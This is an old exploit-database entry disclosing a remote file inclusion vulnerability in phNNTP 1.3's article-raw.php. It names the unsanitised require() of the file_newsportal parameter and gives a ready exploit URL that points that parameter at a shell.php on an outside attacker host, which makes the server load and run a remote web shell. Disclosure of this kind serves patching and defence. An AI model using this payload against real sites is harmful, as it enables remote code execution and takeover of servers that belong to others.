id: 663
date: 08/07/2006
title: phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
author: Drago84
cves: 

=================================================================
phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
=================================================================



phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?



#  0day.today [2023-03-27]  #